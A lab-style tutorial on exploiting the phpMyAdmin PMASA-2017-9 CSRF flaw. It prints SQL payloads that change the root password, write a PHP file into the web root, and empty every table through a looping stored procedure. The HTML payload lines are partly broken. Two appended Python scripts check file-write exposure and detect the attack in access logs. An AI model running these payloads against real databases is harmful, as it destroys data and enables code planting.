PhpMyAdmin 4.7.x CSRF Exploit

Source: Internet
Author: User
Tags: phpinfo, phpmyadmin


phpMyAdmin is a MySQL database management tool written in PHP (an open-source scripting language). It is deployed on the web server and lets an administrator manage MySQL databases through a web interface. That interface is an easy way to enter complex SQL, and it is especially convenient for importing and exporting large amounts of data. A major advantage is that, because phpMyAdmin runs on the web server like any other PHP program, the HTML pages it generates can be used from anywhere, so databases and tables can be created, modified and deleted remotely. phpMyAdmin can also generate the corresponding PHP code for a query, which helps ensure that the SQL embedded in web pages is syntactically correct.

CSRF (PMASA-2017-9) vulnerability

The phpMyAdmin team fixed a serious CSRF vulnerability (PMASA-2017-9) in version 4.7.7: an attacker could silently execute arbitrary SQL statements by inducing a logged-in administrator to visit a malicious page.

We can get familiar with the exploitation of this vulnerability using Vulnspy's online phpMyAdmin environment.

Process

Online phpMyAdmin CSRF
(Note: restart the demo target machine to reset it.)

1. Create a phpMyAdmin environment online

Click the Create button Vulnspy provides to create the target machine (https://www.vsplate.com/?github=vulnspy/PMASA-2017-9).

After the redirect to Vsplate, a phpMyAdmin environment is created automatically by simply clicking the Go button.

Open the demo address link and our phpMyAdmin instance is ready.

Log in to phpMyAdmin with the account root and password Toor. From the page information we can see that the current phpMyAdmin version is 4.7.6, which matches the vulnerable version range.

2. CSRF exploit: modify the current database user's password

To use CSRF to delete or modify database content, you need to know the database name, table name and field names in advance. That makes exploitation fiddly and the success rate limited, so here are two more general ways to exploit it.

MySQL lets the current user's password be changed with a SQL statement. For example, to change the current user's password to www.vulnspy.com, the corresponding SQL statement is:

SET password=PASSWORD('www.vulnspy.com');
Demo: 2.1 Simulate the administrator's logged-in phpMyAdmin session

Log in to phpMyAdmin with the account root and password Toor.

2.2 Create a page that contains the malicious code

First create an HTML file: vi 2.payload.html

It only needs to show Hello World; the purpose is just to get the victim to open the page, so the visible content does not matter. The code is as follows:

<p>Hello World</p>
2.3 Open the file containing the malicious code, 2.payload.html, in a browser

Going straight back to the interface opened in 2.1, we find that it has automatically logged out, and that logging in with the original password Toor no longer works.

2.4 Logging in successfully with the password www.vulnspy.com shows the exploit worked

3. CSRF exploit: write a file

MySQL supports writing query results to a file, which we can use to write a PHP file. For example, to write the code <?php phpinfo();?> to the file /var/www/html/test.php, the corresponding SQL statement is:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';
Demo: 3.1 Modify the code
<p>Hello World</p>‘ into outfile ‘/var/www/html/test.php‘;" style="display:none;" />
3.2 Open the file containing the malicious code in a browser

3.3 Access test.php
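The file-write step above only succeeds when two MySQL-side conditions hold, and an administrator can check both from the output of SHOW GRANTS and SHOW VARIABLES LIKE 'secure_file_priv'. The following posture check is an added example, not code from the article or from phpMyAdmin. It assumes standard MySQL semantics for secure_file_priv (empty means writes anywhere mysqld can write, NULL means the feature is disabled, a path confines writes to that directory) and for the global FILE privilege; the grant strings, the secure_file_priv values and the account names are constructed, and the web root /var/www/html is the path used in the article.

```python
"""Check whether a MySQL account could write into the web root with INTO OUTFILE.

Added example (not from the original article). It models the two MySQL-side
preconditions for the file-write step: the account needs the global FILE
privilege, and secure_file_priv must allow writes to the target directory
(empty = anywhere, NULL = disabled, a path = only under that path).
"""
import os
import re

GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO ", re.IGNORECASE)


def parse_grants(grant_lines):
    """Set of (PRIVILEGE, scope) pairs from SHOW GRANTS output lines."""
    privs = set()
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        for p in m.group("privs").split(","):
            privs.add((p.strip().upper(), m.group("scope")))
    return privs


def has_file_privilege(grant_lines):
    """FILE is a global privilege, so it only counts when granted ON *.*."""
    privs = parse_grants(grant_lines)
    return ("FILE", "*.*") in privs or ("ALL PRIVILEGES", "*.*") in privs


def outfile_risk(secure_file_priv, grant_lines, web_root):
    """Return (exposed, reason); exposed is True when INTO OUTFILE could land in web_root."""
    if not has_file_privilege(grant_lines):
        return False, "account lacks the global FILE privilege"
    if secure_file_priv is None or secure_file_priv.strip().upper() == "NULL":
        return False, "secure_file_priv is NULL: LOAD DATA / INTO OUTFILE disabled"
    if secure_file_priv.strip() == "":
        return True, "secure_file_priv is empty: writes allowed anywhere mysqld can write"
    allowed = os.path.normpath(secure_file_priv)
    target = os.path.normpath(web_root)
    if target == allowed or target.startswith(allowed + os.sep):
        return True, "web root lies inside secure_file_priv (%s)" % allowed
    return False, "writes confined to %s, outside the web root" % allowed


# Constructed sample data: SHOW GRANTS output for two accounts.
GRANTS_ROOT = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
GRANTS_APP = [
    "GRANT USAGE ON *.* TO 'app'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'app'@'localhost'",
]

if __name__ == "__main__":
    for label, sfp, grants in [
        ("root, secure_file_priv empty", "", GRANTS_ROOT),
        ("root, secure_file_priv NULL", "NULL", GRANTS_ROOT),
        ("root, secure_file_priv=/var/lib/mysql-files", "/var/lib/mysql-files/", GRANTS_ROOT),
        ("app user, secure_file_priv empty", "", GRANTS_APP),
    ]:
        print(label, "->", outfile_risk(sfp, grants, "/var/www/html"))
```

Two further conditions are not modelled here: the operating-system user mysqld runs as must be able to write to the directory, and INTO OUTFILE refuses to overwrite an existing file. The hardening follows directly from the check: point secure_file_priv at a dedicated directory outside any web root (many 5.7+ packages already default to one) and do not log in to phpMyAdmin with an account that holds FILE.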

4. CSRF exploit: empty all data tables

To cause widespread, direct damage, we can use SQL statements to empty every data table the current MySQL user can manipulate.

1) Get the database name and table name

SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT 0,1

2) Splice it into a DELETE statement and run the generated DELETE statement with EXECUTE:

set @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT 0,1);prepare stmt from @del;execute stmt;

3) EXECUTE runs only one SQL statement at a time, so we use a loop to execute each one:

DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
CREATE PROCEDURE EMPT()
BEGIN
    DECLARE i INT;
    SET i = 0;
    -- walk the table list one row at a time; LIMIT may use a local variable inside a stored procedure
    WHILE i < 100 DO
        SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
        PREPARE STMT FROM @del;
        EXECUTE STMT;
        SET i = i +1;
    END WHILE;
END $$
DELIMITER ;
CALL EMPT();
Demo: 4.1 The payload is as follows

<p>Hello World</p>

4.2 Open the file containing the malicious code in a browser

4.3 Go back to phpMyAdmin to view the data

We find that the data in the databases Vulnspy_tables and vulnspy_test has been emptied.
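Sections 2 to 4 all rely on the same mechanism: the victim's browser fetches a phpMyAdmin URL that carries the SQL statement, so every such request lands in the web server's access log. The detector below is an added example, not code from the article or from phpMyAdmin. It assumes Apache/nginx combined-format logs and that the query URL hits phpMyAdmin's sql.php with the statement in the sql_query parameter (the article does not show its URLs); the log lines, hostnames and IP addresses are constructed, and the SQL in them is the article's own.

```python
"""Flag GET-based phpMyAdmin query execution in web server access logs.

Added example (not from the original article). Assumptions: logs are in the
Apache/nginx "combined" format, and the query URL hits phpMyAdmin's sql.php with
the statement in the sql_query parameter (the article does not show its URLs).
"""
import re
from urllib.parse import parse_qs, urlsplit

# combined format: ip ident user [ts] "METHOD url proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Statement shapes from the walkthrough (password change, INTO OUTFILE, the
# DELETE loop built with PREPARE/EXECUTE). A starting point, not a full SQL grammar.
DANGEROUS_SQL = re.compile(
    r"\b(SET\s+PASSWORD|ALTER\s+USER|INTO\s+(OUT|DUMP)FILE|DELETE\s+FROM|DROP\s+|TRUNCATE\s+"
    r"|PREPARE\s+\w+\s+FROM|CREATE\s+PROCEDURE|UPDATE\s+\w+\s+SET)",
    re.IGNORECASE,
)

# Constructed sample log: two exploit-style GETs, one normal POST, one normal GET browse.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2018:10:00:01 +0000] "GET /phpmyadmin/sql.php?db=test&sql_query=SET+password%3DPASSWORD(%27www.vulnspy.com%27) HTTP/1.1" 200 512 "http://attacker.example/2.payload.html" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2018:10:00:02 +0000] "GET /phpmyadmin/sql.php?db=test&sql_query=select+%27%3C%3Fphp+phpinfo()%3B%3F%3E%27+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2Ftest.php%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2018:10:05:00 +0000] "POST /phpmyadmin/sql.php HTTP/1.1" 200 4096 "http://pma.example/phpmyadmin/sql.php" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2018:10:06:00 +0000] "GET /phpmyadmin/sql.php?db=test&table=t&sql_query=SELECT+*+FROM+t+LIMIT+0%2C25 HTTP/1.1" 200 4096 "http://pma.example/phpmyadmin/index.php" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(referer):
    """Hostname from the Referer header, or None when the header is absent ("-")."""
    if not referer or referer == "-":
        return None
    return urlsplit(referer).hostname


def check_request(entry, own_host):
    """Reasons a request looks like cross-site SQL execution; empty list if it looks fine.

    Only GET requests carrying sql_query are considered: the advisory's vector is a
    crafted link, and a hidden <img> in the attacker's page can only issue GETs.
    """
    url = urlsplit(entry["url"])
    if entry["method"] != "GET" or not url.path.endswith("/sql.php"):
        return []
    sql = parse_qs(url.query).get("sql_query", [""])[0]
    if not sql:
        return []
    reasons = []
    if DANGEROUS_SQL.search(sql):
        reasons.append("state-changing SQL via GET: " + sql[:50])
    host = referer_host(entry["referer"])
    if host is None:
        reasons.append("no Referer on query request")
    elif host != own_host:
        reasons.append("cross-site Referer host " + host)
    return reasons


def scan(log_text, own_host):
    """Return [(ip, url, reasons)] for every suspicious request in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = check_request(entry, own_host)
        if reasons:
            hits.append((entry["ip"], entry["url"], reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan(SAMPLE_LOG, "pma.example"):
        print(ip, url[:60], "->", "; ".join(reasons))
```

The signature is the combination: a state-changing statement delivered by GET, arriving with no Referer or a Referer from another origin (a browser loading an <img> sends the embedding page as Referer unless a referrer policy suppresses it). A plain SELECT issued by phpMyAdmin's own browse links, as in the last sample line, is not flagged. Logs only give detection after the fact; the fix is to upgrade to 4.7.7 or later, and until then to keep phpMyAdmin sessions short and never open untrusted pages while logged in.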
